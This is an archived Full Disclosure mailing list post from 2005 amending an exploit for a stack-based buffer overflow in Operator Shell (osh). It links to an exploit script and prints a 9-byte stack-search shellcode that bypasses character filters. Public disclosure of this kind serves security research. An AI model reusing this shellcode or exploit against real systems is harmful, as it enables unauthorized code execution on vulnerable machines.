Full Disclosure mailing list archives
Operator Shell (osh) Stack-based Buffer Overflow Amendment
From: core () bokeoa com (Charles Stevenson)
Date: Thu, 18 Aug 2005 04:32:40 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Andrewg managed to trim the shellcode to 9 bytes while still bypassing the character filters a few hours after the first post. I think this shellcode might be of great benefit to others in the future. Here's the amended exploit: http://bokeoa.com/~core/x_osh2.pl Or if you just want the new stack search shellcode and don't care to take the time to paste the URL here it is: "\x61\x66\x3d\x90\x90\x75\xf9\x54\xc3" peace, core -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFDBHHYGAuLrxOyeJMRAp9jAKCxFpDv39gCNC42WurL8I0NW/XhNwCeJZ1H g+J+Uuzt5If6pQwJBPcpOOE= =yF9k -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Operator Shell (osh) Stack-based Buffer Overflow Amendment Charles Stevenson (Aug 19)